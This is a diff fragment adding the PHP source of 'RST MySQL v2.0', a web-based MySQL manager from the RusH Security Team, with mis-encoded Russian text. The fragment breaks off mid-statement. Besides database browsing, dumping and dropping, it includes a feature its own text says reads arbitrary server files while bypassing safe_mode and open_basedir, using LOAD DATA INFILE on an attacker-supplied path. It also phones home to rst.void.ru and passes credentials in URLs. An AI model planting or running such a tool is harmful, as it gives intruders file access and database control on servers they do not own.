+      </table> 
+</td></tr>
+</table>
+</td></tr></table>";
+
+ print "
+  <html><HEAD><TITLE>RST MySQL</TITLE>
+
+  <META http-equiv=Content-Type Pragma: no-cache; content=\"text/html; charset=windows-1251\">
+   <style>
+   td {  
+   font-family: verdana, arial, ms sans serif, sans-serif;  
+   font-size: 11px;  
+   color: #000000; 
+   }
+   BODY {
+   margin-top: 4px; 
+   margin-right: 4px; 
+   margin-bottom: 4px; 
+   margin-left: 4px;
+   scrollbar-face-color: #b6b5b5;
+   scrollbar-highlight-color: #758393; 
+   scrollbar-3dlight-color: #000000; 
+   scrollbar-darkshadow-color: #101842; 
+   scrollbar-shadow-color: #ffffff; 
+   scrollbar-arrow-color: #000000;
+   scrollbar-track-color: #ffffff; 
+   }
+   A:link {COLOR:blue; TEXT-DECORATION: none}
+   A:visited { COLOR:blue; TEXT-DECORATION: none}
+   A:active {COLOR:blue; TEXT-DECORATION: none}
+   A:hover {color:red;TEXT-DECORATION: none}
+   input, textarea, select {
+   background-color: #EBEAEA;
+   border-style: solid;
+   border-width: 1px;
+   font-family: verdana, arial, sans-serif;
+   font-size: 11px;
+   color: #333333;
+   padding: 0px;
+   }
+  </style></HEAD><BODY>";
+
+
+if ($sapi_type == "cgi") {
+    $php_type="CGI";
+} else {
+    $php_type="ìîäóëü";
+}
+
+$form_file="
+        <table width=80% align=center border=0>
+        <tr><td align=center>×òåíèå&nbsp;ïðîèçâîëüíîãî&nbsp;ôàéëà,&nbsp;ñåðâåðà&nbsp;(&nbsp;<b>$server</b>&nbsp;)</td></tr>
+        <tr><td>
+        <table cellpadding=5 cellspacing=1 bgcolor=#FFFFFF border=0>
+        <tr bgcolor=#DBDCDD><td align=center>
+        Ïðè óñëîâèè, ÷òî ôàéë äîñòóïåí äëÿ <b>÷òåíèÿ</b> è ïðè
+        íàëè÷èè ó ïîëüçîâàòåëÿ ïðèâèëåãèè <b>FILE</b>, <b>SELECT</b>,
+        <b>CREATE</b>, ïðàâèëüíîì ïóòè è èìåíè - âîçìîæíî ÷òåíèå ïðîèçâîëüíîãî ôàéëà.
+        Îáõîä îãðàíè÷åíèé ïðè <b>safe_mode</b> è <b>safe_basedir</b>
+        </td></tr></table></td></tr>
+        <form method=\"GET\" action=\"$self?f=x_file\">
+        <input type=\"hidden\" name=\"s\" value=\"$s\">                
+        <input type=\"hidden\" name=\"server\" value=\"$server\">
+        <input type=\"hidden\" name=\"port\" value=\"$port\">
+        <input type=\"hidden\" name=\"login\" value=\"$login\">
+        <input type=\"hidden\" name=\"passwd\" value=\"$passwd\">
+        <tr><td align=center><br>Ïîëíûé ïóòü ê ôàéëó: <input type=\"text\" name=\"p_file\" value=\"$p_v\" size=\"40\">&nbsp;&nbsp;&nbsp;&nbsp;
+        <input type=\"submit\" value=\"ïîêàçàòü ôàéë\">&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table><br>";
+
+$start_form="<br>
+<table align=center border=0 width=100% cellpadding=2 cellspacing=0 bgcolor=#FFFFFF>
+ <tr>
+   <td>
+<table align=center width=80% cellpadding=0 cellspacing=1 bgcolor=#000000>
+<tr><td>
+      <table background=".$self."?img=bg_f border=0 width=100% cellpadding=0 cellspacing=0 bgcolor=#C2C2C2>
+         <tr>
+            <td width=25>
+                <font face=Webdings size=6>&#0325;</font>
+            </td>
+            <td>
+                <font size=4><b>RST MySQL</b></font> <font color=#FFFFFF><b>v(2.0)</b></font>
+            </td>
+            <td width=33% align=right>
+                ".date ("j F- Y- g:i")."&nbsp;&nbsp;
+            </td>
+         </tr>
+      </table> 
+</td></tr>
+</table>
+
+</td></tr>
+<tr><td>
+
+<table align=center border=0 width=80% cellpadding=2 cellspacing=0 bgcolor=#FFFFFF>
+ <tr>
+   <td bgcolor=#DBDCDD valign=top width=200><br>
+        <center><b>Óòèëèòà äëÿ ðàáîòû ñ MySQL</b></center><hr width=98%>
+        <li>Ïðîñìîòð áàç è òàáëèö.
+        <li>Ïðîèçâîëüíûå çàïðîñû ê ÁÄ.
+        <li>Ðåäàêòèðîâàíèå áàç è òàáëèö.
+        <li>Äàìïû ÁÄ èëè òàáëèö.<hr width=98%>
+        Type - FREE<br>
+        Home page: <a href=http://rst.void.ru><b>http://rst.void.ru</b></a>
+        <center><br><br><font face=Webdings size=+18 color=#B6B5B5>&#0168;</font><center>
+   </td>
+   <td background=".$self."?img=st_form_bg bgcolor=#E6E7E9><center><font size=2>
+        <br>Äëÿ ñîåäèíåíèÿ ñ ñåðâåðîì MySQL ââåäèòå <b>ÈÌß</b>, <b>ÏÀÐÎËÜ</b> (ïîëüçîâàòåëÿ MySQL) è èìÿ <b>ÕÎÑÒÀ</b>.</font></center><br>
+        <li>Åñëè ëîãèí þçåðà mysql íå óêàçàí ÿâíî, ïî óìîë÷àíèþ ïîäñòàâëÿåòñÿ èìÿ âëàäåëüöà ïðîöåññà.
+        <li>Åñëè ïàðîëü þçåðà mysql íå óêàçàí ÿâíî, ïî óìîë÷àíèþ ïîäñòàâëÿåòñÿ ïóñòîé ïàðîëü.
+        <li>Åñëè èìÿ ñåâðâåðà mysql íå óêàçàíî ÿâíî, ïî óìîë÷àíèþ ïîäñòàâëÿåòñÿ <b>localhost</b>
+        <li>Åñëè ïîðò äëÿ ñåâðâåðà mysql íå óêàçàí ÿâíî, ïîäñòàâëÿåòñÿ  ïîðò ïî óìîë÷àíèþ, îáû÷íî (<b>3306</b>)<br><br>
+        <center>Âåðñèÿ PHP (<b>".phpversion()."</b>)&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ID PHP script (<b>".GET_current_user( )."</b>)</center>
+        <br><table align=center>
+        <tr><td>èìÿ þçåðà MySQL</td><td align=right>ïàðîëü þçåðà MySQL&nbsp;</td></tr>
+        <form method=\"GET\" action=\"$self\">
+        <input type=\"hidden\" name=\"s\" value=\"y\">
+        <tr>
+          <td><input type=\"text\" name=\"login\" value=\"root\" maxlength=\"64\"></td>
+          <td align=right><input type=\"text\" name=\"passwd\" value=\"$passwd\" maxlength=\"64\"></td>
+        </tr>
+        <tr><td>Ñåðâåð MySQL</td><td>ïîðò</td></tr>
+        <tr>                
+          <td><input type=\"text\" name=\"server\" value=\"localhost\" maxlength=\"64\"></td>
+          <td><input type=\"text\" name=\"port\" value=\"3306\" maxlength=\"6\" size=\"3\">
+          <input type=\"submit\" value=\"ïîäêëþ÷èòüñÿ\"></td>
+        </tr></table><br>        
+   </td>
+ </tr>
+</table>
+
+</td></tr>
+<tr><td>
+<table align=center width=80% cellpadding=0 cellspacing=1 bgcolor=#000000>
+<tr><td>
+      <table background=".$self."?img=bg_f align=center border=0 width=100% cellpadding=0 cellspacing=0 bgcolor=#C2C2C2>
+         <tr>
+            <td align=center>
+                free script &copy;RusH Security Team 
+            </td>
+         </tr>
+      </table> 
+</td></tr>
+</table>
+</td></tr></table><center><font size=-1 color=#D0D1D2>(coded by dinggo)</font></center>
+";
+
+if ($os =='win') {
+$os="OS- <b>".$HTTP_ENV_VARS["OS"]."</b>";
+}else{
+   $str_k=$_ENV["BOOT_FILE"];
+   $k=preg_replace ("/[a-zA-Z\/]/","", $str_k);
+   $os="OS\Kernel: <b>".$_ENV["BOOT_IMAGE"].$k."</b>";
+
+}
+
+if (!isset($s) || $HTTP_GET_VARS[s] != 'y') { print $start_form;
+ $serv = array(127,192,172,10);
+ $adrr=@explode('.', $HTTP_SERVER_VARS["SERVER_ADDR"]);
+ if (!in_array($adrr[0], $serv)) {
+   //ïðè ïîÿâëåíèè íîâîé âåðñèè óòèëèòû ïîêàæåì ÷òî äîñòóïíà
+   //íîâàÿ âåðñèÿ è ïðåäëîæèì çàãðóçèòü åå ñ ñàéòà
+   @print "<img src=\"http://rst.void.ru/version_sql/version.php\" border=0 height=0>";
+   @readfile ("http://rst.void.ru/version_sql/version.php");  
+ }
+exit;
+}
+
+$form_ad_b="<br>
+<table width=80% align=center border=0 cellpadding=0 cellspacing=1 bgcolor=#FFFFFF> 
+ <tr>
+   <td>
+   <table width=100% align=center border=0 cellpadding=4 cellspacing=0 bgcolor=#DBDCDD> 
+    <td>
+      MySQL <b>$server</b> v.(<b>".mysql_GET_server_info()."</b>)
+   </td>
+   <td align=center>
+      <b>".$HTTP_SERVER_VARS["SERVER_SOFTWARE"]."</b>
+   </td>
+   <td align=right>
+      Âåðñèÿ PHP (<b>".phpversion()."</b>) $php_type
+   </td>
+ </tr>
+ <tr bgcolor=#DBDCDD>
+   <td>
+      IP:<b>".$HTTP_SERVER_VARS["SERVER_ADDR"]."</b> Name:<b>".$HTTP_SERVER_VARS["SERVER_NAME"]."</b>
+   </td>
+   <td align=center>
+      ID PHP script (<b>".GET_current_user( )."</b>)
+   </td>
+   <td align=right>
+      $os
+   </td>
+ </tr>
+ </table>
+</td></tr></table>
+<table width=80% align=center border=0 cellpadding=5 cellspacing=1> 
+ <tr>
+   <td>
+        <a href=\"$self?s=$s&stat=TRUE&login=$login&passwd=$passwd&server=$server&port=$port\"><b>Ñòàòèñòèêà MySQL</b></a>
+   </td>
+   <td align=center>
+        <a href=\"$self?s=$s&php=ok\" tarGET=\"_blank\"><b>Èíôîðìàöèÿ PHP (ALL)</b></a>
+   </td>
+   <td align=right>
+        <a href=\"$self?s=$s&proc=TRUE&login=$login&passwd=$passwd&server=$server&port=$port\"><b>Ïðîöåññû MySQL </b></a>
+   </td>
+ </tr>
+ <tr>
+   <td>
+        <a href=\"$self?s=$s&apc=TRUE&login=$login&passwd=$passwd&server=$server&port=$port\"><b>Ïåðåìåííûå Apache </b></a>
+   </td>
+   <td align=center>
+        <a href=\"$self?s=$s&var=TRUE&login=$login&passwd=$passwd&server=$server&port=$port\"><b>Ïåðåìåííûå MySQL </b></a> 
+   </td>
+   <td align=right>
+        <a href=\"$self?s=$s&f=x_file&login=$login&passwd=$passwd&server=$server&port=$port\" title=\"Ïðîñìîòð ïðîèçâîëüíîãî ôàéëà ñåðâåðà äàæå ïðè âêëþ÷åíîì safe_mode è safe_mode_exec_dir\"><b>Ôàéë *?</b></a>
+   </td>
+ </tr>
+</table><br>
+
+<table width=300 align=center cellpadding=0 cellspacing=1 bgcolor=#FFFFFF>
+<tr bgcolor=#DBDCDD><td>
+<table align=center cellpadding=0 cellspacing=0>
+ <tr bgcolor=#DBDCDD>
+   <td> <table cellpadding=4><tr><td><b>Ñîçäàòü íîâóþ áàçó äàííûõ</b></td></tr><tr><td>
+        <form method=\"GET\" action=\"$self?s=$s&login=$login&passwd=$passwd&server=$server&port=$port\">
+        <input type=\"hidden\" name=\"s\" value=\"$s\">
+        <input type=\"hidden\" name=\"server\" value=\"$server\">
+        <input type=\"hidden\" name=\"port\" value=\"$port\">
+        <input type=\"hidden\" name=\"login\" value=\"$login\">
+        <input type=\"hidden\" name=\"passwd\" value=\"$passwd\">
+        <input type=\"text\" name=\"new_db\" value=\"\" maxlength=\"64\">
+        <input type=\"submit\" value=\"ñîçäàòü\"></td>
+        </tr></table>
+   </td>
+ </tr>
+</table>
+</td>    
+</tr></table></form>
+
+<table width=80% align=center border=0 cellpadding=0>
+ <tr align=right>
+   <td width=85%></td>
+   <td width=15>
+    <a href=$self><img src=".$self."?img=b_close border=0 title=close></a>
+  </td>
+ </tr>
+</table>
+";
+        
+$cnt_b=mysql_num_rows(mysql_list_dbs());  // êîë-âî áàç mysql ñåðâåðà  
+print "
+<table align=center border=0 width=100% cellpadding=1 cellspacing=0 bgcolor=#FFFFFF>
+ <tr>
+   <td>
+<table align=center width=100% cellpadding=0 cellspacing=1 bgcolor=#000000>
+<tr><td>
+      <table background=".$self."?img=bg_f border=0 width=100% cellpadding=0 cellspacing=0 bgcolor=#C2C2C2>
+         <tr>
+            <td>
+                <font face=Webdings size=6>&#0325;</font>
+            </td>
+            <td width=33%>
+                <font size=4><b>RST MySQL</b></font>
+            </td>
+            <td width=33% align=center>
+                <font color=blue><b>$server</b></font>&nbsp;[CONNECTION Ok] &nbsp;&nbsp;Âñåãî áàç: <b>$cnt_b</b>
+            </td>
+            <td width=33% align=right>
+                ".date ("j F- Y- g:i")."&nbsp;&nbsp;
+            </td>
+         </tr>
+      </table> 
+</td></tr>
+</table>
+
+</td></tr>
+<tr><td>
+
+<table background=".$self."?img=send_img align=center border=0 width=100% cellpadding=0 cellspacing=0 bgcolor=#FFFFFF>
+ <tr>
+   <td bgcolor=#DBDCDD valign=top width=170>";
+
+if (isset($server)&&isset($port)&&isset($login)&&isset($passwd)){
+ $connection = mysql_connect($server.":".$port, $login, $passwd) or die("$header<table align=center width=80% bgcolor=red><tr><br>Îøèáêà ñîåäèíåíèÿ ñ MySQL ñåðâåðîì <b>$server</b><td><center><font size=2><b>".mysql_error()."</b></font></center><br><b>Âåðîÿòíûå îøèáêè:</b><li>Íå ïðàâèëüíûé àäðåñ ñåðâåðà <b>$server</b><li>Íå ïðàâèëüíûé íîìåð ïîðòà <b>$port</b><li>Íå âåðíîå èìÿ (login) þçåðà mysql <b>$login</b><li>Íå âåðíûé ïàðîëü (password) þçåðà mysql <b>$passwd</b><li>Äîñòóï ê ñåðâåðó $server çàïðåùåí ñ àäðåñà <b>".GETenv('REMOTE_ADDR')."</b><li>Óäàëåííûé ñåðâåð âðåìåííî íå äîñòóïåí</td></tr></table><br></td></tr></table><script>alert('Íå âîçìîæíî óñòàíîâèòü ñîåäèíåíèå ñ MySQL ñåðâåðîì $server \\n\\n Ïðîâåðüòå ïðàâèëüíîñòü âõîäÿùèõ äàííûõ:\\n\\nñåðâåð $server\\nïîðò $port\\nèìÿ $login\\nïàðîëü $passwd');</script><head><META HTTP-EQUIV='Refresh' CONTENT='0;url=$self'></head>");
+}
+
+
+/*---------------------- L E F T   B L O C K (menu bd)! -------------------*/
+/*Ïîêàçàòü âñå áàçû ñåðâåðà*/
+if ($connection&&!isset($db)) {
+   print "<table border=0 cellpadding=0 cellspacing=1 width=100% bgcolor=#FFFFFF><tr><td bgcolor=#B6B5B5 align=center>".
+           "<a href=\"$self?s=$s&login=$login&passwd=$passwd&server=$server&port=$port\" title=\"Âåðíóòüñÿ â íà÷àëî è îáíîâèòü ñïèñîê áàç\"><font color=green><b>".
+           "Ïîêàçàòü&nbsp;âñå&nbsp;áàçû</b></font></a></td></tr></table>";
+   
+   $result = mysql_list_dbs($connection) or die("$h_error<b>".mysql_error()."</b>$f_error");
+   while ( $row=mysql_fetch_row($result) ){
+       $cnt_title=mysql_num_rows(mysql_list_tables($row[0])); //êîë-âî òàáëèö áàçû   
+       print "<table valign=top border=0 width=100% cellpadding=0 cellspacing=1 bgcolor=#FFFFFF><tr><td bgcolor=#DBDCDD>";
+       if ($cnt_title < 1) {
+         print "<a href=\"$_SERVER[PHP_SELF]?s=$s&db=$row[0]&cr_tbl=new&login=$login&passwd=$passwd&server=$server&port=$port\" title=\"Âñåãî òàáëèö $cnt_title\"><b>$row[0]</b></a>";
+       }else{
+         print "<a href=\"$_SERVER[PHP_SELF]?s=$s&db=$row[0]&login=$login&passwd=$passwd&server=$server&port=$port\" title=\"Âñåãî òàáëèö $cnt_title\"><b>$row[0]</b></a>";
+       }
+       print "</td></tr></table>";
+    }
+}
+
+// ñïèñîê òàáëèö áàçû äàííûõ
+if (isset($db)){          
+  $result=mysql_list_tables($db) or die ("$h_error<b>".mysql_error()."</b>$f_error<head><META HTTP-EQUIV='Refresh' CONTENT='5;url=$self?s=$s&login=$login&passwd=$passwd&server=$server&port=$port'></head>");
+   print "<table border=0 cellpadding=0 cellspacing=1 width=100% bgcolor=#FFFFFF><tr><td bgcolor=#B6B5B5 align=center>".
+           "<a href=\"$self?s=$s&login=$login&passwd=$passwd&server=$server&port=$port\"><font color=green><b>".
+           "Ïîêàçàòü&nbsp;âñå&nbsp;áàçû</b></font></a></td></tr><tr><td></td></tr><tr><td></td></tr></table>";
+
+  print "<table cellpadding=0 cellspacing=1 width=100% bgcolor=#FFFFFF><tr><td bgcolor=silver align=center>".
+        "---[ <a href=\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&server=$server&port=$port&db=$db\" title=\"îáíîâèòü ñïèñîê òàáëèö\"><b>$db</b></a>".
+        " ]---</a></td></tr><tr><td></td></tr><tr><td></td></tr></table>";
+
+  while ( $row=mysql_fetch_array($result) ){
+    //ïîëó÷àåì êîëè÷åñòâî ñòðîê(çàïèñåé) â òàáëèöå
+    $count=mysql_query ("SELECT COUNT(*) FROM $row[0]");
+    $count_row= mysql_fetch_array($count);
+    print "<table valign=top border=0 width=100% cellpadding=0 cellspacing=1 bgcolor=#FFFFFF>".
+          "<tr><td bgcolor=#DBDCDD>";
+    if ($count_row[0] < 1) { 
+       print "<a href=\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&server=$server&port=$port&db=$db&tbl=$row[0]&nn_row=ok\">$row[0]</a>&nbsp;($count_row[0])</td></tr></table>";  
+    }else{
+        print "<a href=\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&server=$server&port=$port&db=$db&tbl=$row[0]&limit_start=0&limit_count=5\">$row[0]</a>&nbsp;($count_row[0])</td></tr></table>";  
+    }
+    @mysql_free_result($count);
+  }
+} 
+
+/*---------------------- END L E F T   B L O C K (menu bd)! -------------------*/
+
+print "
+   </td>
+   <td valign=top bgcolor=#E6E7E9>";
+
+/*------------------------ R I G H T   B L O C K ! -----------------------*/
+if ($connection&&!isset($db)) { 
+$anon = @mysql_query("SELECT Host,User FROM mysql.user WHERE User=''", $connection); 
+if (mysql_num_rows($anon)>0) { print "<table align=center><tr><td><b>Âíèìàíèå!<b></td></tr><tr><td bgcolor=red>Àíîíèìíûì ïîëüçîâàòåëÿì ðàçðåøåíî ïîäêëþ÷åíèå ê ñåðâåðó MySQL</td></tr></table>"; }
+print $form_ad_b; 
+}
+/*-------------Ïðîöåññû MySql------------*/
+if (isset($proc) && $proc=="TRUE"){
+$result = mysql_query("SHOW PROCESSLIST", $connection); 
+ print "<center><font size=2>Ïðîöåññû MySQL ñåðâåðà [ <b>$server</b> ]</font><center><table align=center border=0 cellpadding=0 cellspacing=1 width=80% bgcolor=#FFFFFF><tr align=center bgcolor=#B6B5B5><td>ID</td><td>USER</td><td>HOST</td><td>DB</td><td>COMMAND</td><td>TIME</td><td>STATE</td><td>INFO</td></tr>";
+ while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
+   print "<tr bgcolor=#DAD9D9><td>$row[0]</td><td>$row[1]</td><td>$row[2]</td><td>$row[3]</td><td>$row[4]</td><td>$row[5]</td><td>$row[6]</td><td>$row[7]</td></tr>";  
+ } 
+  print "</table><br>";
+ mysql_free_result($result);
+ unset($proc);
+}
+
+/*Ñîçäàåì íîâóþ áàçó*/
+if (isset($HTTP_GET_VARS['new_db'])){
+    $new_db=trim($HTTP_GET_VARS['new_db']);
+    if (mysql_create_db ($new_db)) {
+        print ("<center><font size=2>Áàçà <b>$new_db</b> óñïåøíî ñîçäàíà</font></center><br>");
+        print "<head><META HTTP-EQUIV='Refresh' CONTENT='0;url=$self?s=$s&login=$login&passwd=$passwd&server=$server&port=$port'></head>";
+    } else {
+        print "$h_error".mysql_error()."$f_error <head><META HTTP-EQUIV='Refresh' CONTENT='5;url=$self?s=$s&login=$login&passwd=$passwd&server=$server&port=$port'></head>";
+    }
+    unset($new_db);
+}
+
+/*Óäàëåíèå áàçû*/
+if (isset($HTTP_GET_VARS['drop'])){
+     $result_d = mysql_list_dbs($connection) or die("<td bgcolor=#DAD9D9>$h_error".mysql_error()."$f_error</td></tr></table>");
+     while ( $row_d=mysql_fetch_row($result_d) ){
+        if ($drop==$row_d[0]) $dr="TRUE";
+     }
+ if ($dr="TRUE") { 
+ mysql_drop_db($drop,$connection);
+ print ("<center><font size=2>Áàçà <b>$drop</b> óñïåøíî óäàëåíà</font></center><br>");
+ print "<head><META HTTP-EQUIV='Refresh' CONTENT='0;url=$self?s=$s&login=$login&passwd=$passwd&server=$server&port=$port'></head>";
+ }
+unset($drop);
+}
+
+/*-------------×èòàåì ïðîèçâîëüíûé ôàéë ñåðâåðà-----------*/
+if (isset($f)){
+print $form_file;
+}
+if(isset($p_file)){ 
+  mysql_create_db("tmp_bd") or die("$h_error<b>".mysql_error()."</b>$f_error");
+  mysql_select_db("tmp_bd") or die("$h_error<b>".mysql_error()."</b>$f_error"); 
+  mysql_query('CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );') or die("$h_error<b>".mysql_error()."</b>$f_error");
+  mysql_query("LOAD DATA INFILE \"".addslashes($p_file)."\" INTO TABLE tmp_file");
+ $query = "SELECT * FROM tmp_file";
+ $result = mysql_query($query) or die("$h_error<b>".mysql_error()."</b>$f_error");
+  /*ïîëó÷àåì íàçâàíèÿ ñòîëáöîâ*/
+  for ($i=0;$i<mysql_num_fields($result);$i++){
+   $name=mysql_field_name($result,$i);
+  } 
+  print "<table align=center border=0 cellpadding=5 cellspacing=1 width=90% bgcolor=#FFFFFF><tr><td align=center bgcolor=#DBDCDD>$name</td></tr>
+        <tr><td background=".$self."?img=st_form_bg bgcolor=#ECEDEE>
+        <form method=\"GET\" action=\"$self?f=x_file\">
+        <input type=\"hidden\" name=\"s\" value=\"$s\">                
+        <input type=\"hidden\" name=\"server\" value=\"$server\">
+        <input type=\"hidden\" name=\"port\" value=\"$port\">
+        <input type=\"hidden\" name=\"login\" value=\"$login\">
+        <input type=\"hidden\" name=\"passwd\" value=\"$passwd\">
+        Ïîëíûé ïóòü ê ôàéëó: <input type=\"text\" name=\"p_file\" value=\"$p_file\" size=\"40\">&nbsp;&nbsp;&nbsp;&nbsp;
+        <input type=\"submit\" value=\"ïîêàçàòü ôàéë\"></form>
+  ";
+  while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) {
+      foreach ($line as $key =>$col_value) {          
+          print htmlspecialchars($col_value)."<br>";
+      }
+  }
+  mysql_free_result($result);
+  print "</td></tr></table><br>";
+  mysql_drop_db("tmp_bd") or die("$h_error<b>".mysql_error()."</b>$f_error");
+} 
+
+/*--------------ïåðåìåííûå ñåðâåðà Apache------------*/
+if (isset($apc) && $apc=="TRUE"){
+ print "<center><font size=2>Ïåðåìåííûå ñåðâåðà Apache [ <b>$server</b> ]</font><center>
+ <table align=center border=0 cellpadding=0 cellspacing=1 width=80% bgcolor=#FFFFFF>
+  <tr align=center bgcolor=#B6B5B5>
+   <td>Îïèñàíèå</td><td>Ïåðåìåííàÿ</td>
+  </tr> 
+  <tr bgcolor=#DAD9D9><td>Èìÿ Internet-õîñòà</td><td>".$HTTP_SERVER_VARS["SERVER_NAME"]."</td></tr>
+  <tr bgcolor=#DAD9D9><td>IP-àäðåñ õîñòà</td><td>".$HTTP_SERVER_VARS["SERVER_ADDR"]."</td></tr>
+  <tr bgcolor=#DAD9D9><td>Ïîðò Web-ñåðâåðà.</td><td>".$HTTP_SERVER_VARS["SERVER_PORT"]."</td></tr>
+  <tr bgcolor=#DAD9D9><td>Ñïåöèôèêàöèÿ CGI èíòåôåéñà.</td><td>".$HTTP_SERVER_VARS["GATEWAY_INTERFACE"]."</td></tr>
+  <tr bgcolor=#DAD9D9><td>Ïðîòîêîë ïðè çàïðîñå äàííîé ñòðàíèöû (ìåòîä).</td><td>".$HTTP_SERVER_VARS["REQUEST_METHOD"]."</td></tr>
+  <tr bgcolor=#DAD9D9><td>Root äèðåêòîðèÿ äëÿ äàííîãî ïîëüçîâàòåëÿ.</td><td>".$HTTP_SERVER_VARS["DOCUMENT_ROOT"]."</td></tr>
+  <tr bgcolor=#DAD9D9><td>Çàãîëîâîê òåêóùåãî çàïðîñà.</td><td>".$HTTP_SERVER_VARS["HTTP_CONNECTION"]."</td></tr>
+  <tr bgcolor=#DAD9D9><td>Äèðåêòèâà httpd.conf (SERVER_ADMIN).</td><td>".$HTTP_SERVER_VARS["SERVER_ADMIN"]."</td></tr>
+  <tr bgcolor=#DAD9D9><td>Ñèãíàòóðà ñåðâåðà.</td><td>".$HTTP_SERVER_VARS["SERVER_SIGNATURE"]."</td></tr>
+ </table><br>";
+ unset($apc);
+}
+
+/*---------------Ñòàòèñòèêà MySQL ñåðâåðà--------------*/
+if (isset($stat) && $stat=="TRUE"){
+$result = mysql_query("SHOW STATUS", $connection); 
+ print "<center><font size=2>Ïåðåìåííûå ñîñòîÿíèÿ MySQL ñåðâåðà [ <b>$server</b> ]</font><center><table align=center border=0 cellpadding=0 cellspacing=1 width=400 bgcolor=#FFFFFF><tr align=center bgcolor=#B6B5B5><td>Ïåðåìåííûå ñîñòîÿíèÿ ñåðâåðà</td><td>çíà÷åíèÿ ïåðåìåííûõ</td></tr>";
+ while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
+   print "<tr bgcolor=#DAD9D9><td>$row[0]</td><td>$row[1]</td></tr>";  
+ } 
+  print "</table>";
+ mysql_free_result($result);
+}
+
+/*---------------Ñèñòåìíûå ïåðåìåííûå MySQL ñåðâåðà--------------*/
+if (isset($var) && $var=="TRUE"){
+$result = mysql_query("SHOW VARIABLES ", $connection); 
+ print "<center><font size=2>Ñèñòåìíûå ïåðåìåííûå MySQL ñåðâåðà [ <b>$server</b> ]</font><center><table align=center border=0 cellpadding=0 cellspacing=1 width=80% bgcolor=#FFFFFF><tr align=center bgcolor=#B6B5B5><td>Ïåðåìåííûå ñåðâåðà</td><td>çíà÷åíèÿ ïåðåìåííûõ</td></tr>";
+ while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
+   print "<tr bgcolor=#DAD9D9><td>$row[0]</td><td>$row[1]</td></tr>";  
+ } 
+  print "</table>";
+ mysql_free_result($result);
+unset($var);
+}
+
+/*-------------âûâîä äàííûõ òàáëèö------------*/
+if (isset($db) && !isset($tbl)) {
+$cnt=mysql_num_rows(mysql_list_tables($db)); //êîë-âî òàáëèö áàçû
+ print "<table border=0 align=center width=100% cellpadding=0 cellspacing=0>
+         <tr>
+           <td>
+                <table border=0 align=center width=80% cellpadding=0 cellspacing=1 bgcolor=#FFFFFF>
+                   <tr align=center>                      
+                      <td width=20% bgcolor=#B6B5B5>
+<a href=\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&server=$server&port=$port&db=$db&cr_tbl=new\" title=\"Ñîçäàòü íîâóþ òàáëèöó â áàçå $db\"><b>Ñîçäàòü òàáëèöó</b></a>
+                      </td>
+                      <td width=20% bgcolor=#B6B5B5>
+<a href=\"$_SERVER[PHP_SELF]?s=$s&db=$db&login=$login&passwd=$passwd&server=$server&port=$port&query_tbl&q_tbl=bd\" title=\"Ïðîèçâîëüíûé çàïðîñ ê áàçå\"><b>SQL-çàïðîñ</b></a>
+                      </td>
+                      <td width=20% bgcolor=#B6B5B5>
+<a href=\"$_SERVER[PHP_SELF]?s=$s&db=$db&str=TRUE&login=$login&passwd=$passwd&server=$server&port=$port\" title=\"Ïîêàçàòü ñòðóêòóðó ÁÄ\"><b>ñòðóêòóðà</b></a>
+                      </td>
+                      <td width=20% bgcolor=#B6B5B5>
+<a href=\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&server=$server&port=$port&db=$db&dump=bd\" title=\"Ýêñïîðò äàííûõ áàçû $db\"><b>Äàìï áàçû</b></a>
+                      </td>
+                      <td width=20% bgcolor=#B6B5B5>
+<a href=\"$_SERVER[PHP_SELF]?s=$s&drop=$db&login=$login&passwd=$passwd&server=$server&port=$port\" title=\"Óäàëèòü ÁÄ $db\" onClick=\"return confirm('Óäàëèòü áàçó $db ?')\";><b>óäàëèòü áàçó</b></a>
+                     </td>
+                   </tr> 
+                </table> 
+           </td>
+         </tr>
+         <tr>
+           <td><br>";
+               print "&nbsp;&nbsp;ÁÄ:(<b>$db</b>)  &nbsp;&nbsp;Âñåãî òàáëèö:(<b>$cnt</b>)";
+               if (isset($t)) { print "<br>&nbsp;&nbsp;".base64_decode($t);}
+               if (isset($t2)) { print base64_decode($t2);}
+/*-------------Ñòðóêòóðà áàçû ------------------*/
+if (isset($str) && $str=='TRUE'){
+  mysql_select_db($db);
+  if ($cnt < 1) { 
+      print "<table border=1 width=400 align=center bgcolor=#E7E7D7><tr align=center>".
+            "<td><br><h5>Íåâîçìîæíî ïîêàçàòü ñòðóêòóðó áàçû<br>Â áàçå <font color=blue>".
+            "$db</font> íåò òàáëèö!</h5></td></tr></table><br><br>";     
+  }else{
+    $result = mysql_query("SHOW TABLE STATUS", $connection); 
+    print "<br><center><font size=2>Ñòðóêòóðà áàçû [ <b>$db</b> ]</font></center>".
+          "<table align=center border=0 cellpadding=0 cellspacing=1 width=650 bgcolor=#FFFFFF>".
+          "<tr align=center bgcolor=#B6B5B5><td>èìÿ òàáëèöû</td><td>òèï</td><td>ðÿäîâ</td><td>ñîçäàíà</td>".
+          "<td>ìîäèôèöèðîâàíà</td><td>ðàçìåð(kb)</td><td>äåéñòâèå</td></tr>";
+    while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
+      $size=$row[5]/1000;
+      print "<tr bgcolor=#DAD9D9><td>$row[0]</td><td>$row[1]</td><td align=center>$row[3]</td>".
+            "<td>$row[10]</td><td>$row[11]</td><td align=center>$size</td><td bgcolor=red align=center>".
+            "<a href=\"$_SERVER[PHP_SELF]?s=$s&db=$db&login=$login&passwd=$passwd&server=$server&".
+            "port=$port&drop_table=$row[0]\" onClick=\"return confirm('Óäàëèòü òàáëèöó $row[0]?')\";>óíè÷òîæèòü</a></td>
+            </tr>";  
+    } 
+    print "</table><br>";
+    mysql_free_result($result);
+  }
+} 
+
+print "    </td>
+         </tr>
+       </table>";
+}
+
+/*------------äàìï áàçû----------------*/
+$form_dump_bd=
+"<form method=\"GET\" action=\"$self\">".
